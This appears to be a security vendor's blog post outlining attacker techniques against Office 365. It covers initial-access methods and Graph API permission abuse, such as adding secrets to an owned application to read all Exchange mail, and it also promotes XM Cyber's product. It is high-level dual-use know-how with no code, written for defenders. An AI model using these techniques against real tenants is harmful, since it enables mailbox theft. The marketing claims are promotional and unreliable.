Office 365 – The Attacker Perspective

Office 365 is Microsoft Office software as a service.
Moving into the cloud opens new attack surface vectors. This eventually allows the attacker to gain access to sensitive data stored on emails, drives, SharePoint sites, and more.

Gaining the initial foothold can be achieved from multiple techniques:

  • Password Spraying
  • Credentials stored on GitHub repositories / publicly exposed stored services
  • Abusing PRT SSO tokens from on-premises machines
  • Harvesting users and application credentials from on-premises machines – an attacker can collect access tokens (of users) or application secrets/certificates from known places.
  • Leverage SSRF or RCE against virtual machines
  • More…

Microsoft did a great job by integrating Office 365 products into one API. At least, from the attacker’s perspective, it’s great! The attacker has one API he can use to attack different Office 365 products such as Exchange Online, OneDrive, SharePoint Online, and more…

Once an attacker achieves the initial foothold in the cloud, depending on his permissions, he can abuse AAD permissions to gain control of sensitive information, mailboxes, and more.

Let’s explore a few examples of how the attacker can do it.

Example 1:

The attacker is able to compromise a global reader AAD user. Users with this role can read all the settings and administrative information of Office 365. This user can directly get read access to all the mailboxes related to this tenant.

Example 2:

The attacker was able to compromise a user that is the owner of another application. In our example, let’s consider this application to be a monitoring mail application. Azure Graph API allows attached permissions to applications on Office365 services. For example, the permissions Mail.Read allow you to read mail content from Exchange Online using Microsoft graph API. Since the attacker is the owner of this application, he can add additional secrets to the application. Then, he can authenticate as the application and abuse the attached permissions to gain access to all Exchange Online mails.

How XM Cyber Helps Organizations Manage Office 365 Risks

As we have shown, there are multiple attack vectors towards Office 365 using the Graph API. To manage these risks, it’s necessary to have a tool that gives you critical context about how different exposures can create different attack paths and the consequences that may result if a vulnerability is successfully exploited.

At XM Cyber, we help organizations map attack vectors towards their critical assets. This includes highly sensitive mailboxes or critical SharePoint sites. Most importantly, we help to reduce the attack surface by supplying mitigation steps in each path at the attack vector. All of this is vitally important for managing the specific risks that come with using Office 365.

Minimizing Risk by Focusing on the Small Number of Exposures that Jeopardize Critical Assets

XM Cyber’s attack-centric exposure prioritization technology maps attack vectors by launching simulated attacks on an automated and continuous basis. These attacks mimic the same tactics and paths adversaries are most likely to use when targeting your crown jewel assets, allowing you to view your defenses through the eyes of an attacker. This allows you to gain deep and ongoing visibility into any emerging exposures related to Office 365.

Importantly, XM Cyber technology eliminates 99% of the risk to business-sensitive systems by focusing on the 1% of the exposures that can be exploited. Instead of using narrow metrics like CVSS scores that only deal with exposure severity, XM Cyber technology can identify which gaps are most likely to be leveraged by attackers and help defenders understand the critical attack-centric context.

XM Cyber can identify all the types of exposures that create additional attack paths and extend the attack surface. These include exploitable vulnerabilities, misconfigurations, undermanaged credentials, and legitimate user activities that can be exploited (e.g., SSH, RDP, file access).

In addition to continuously identifying new exposures and attack vectors and prioritizing the cyber risks that affect business-sensitive systems, XM Cyber also provides context-sensitive, least-effort remediation options.

In Conclusion

Office 365 is a core business application used by countless workers every day. Yet the choice to integrate all products into a single API also makes it an object of great interest for cyber attackers.

To manage these risks, we encourage you to use XM Cyber’s industry-leading attack-centric exposure prioritization platform. It is the only product on the market that provides the necessary attack-centric context to extend optimal protection to your most business-critical assets.

Zur Ulianizky is Head of Security Research at XM Cyber


Find and fix the exposures that put your critical assets at risk with ultra-efficient remediation.

See what attackers see, so you can stop them from doing what attackers do.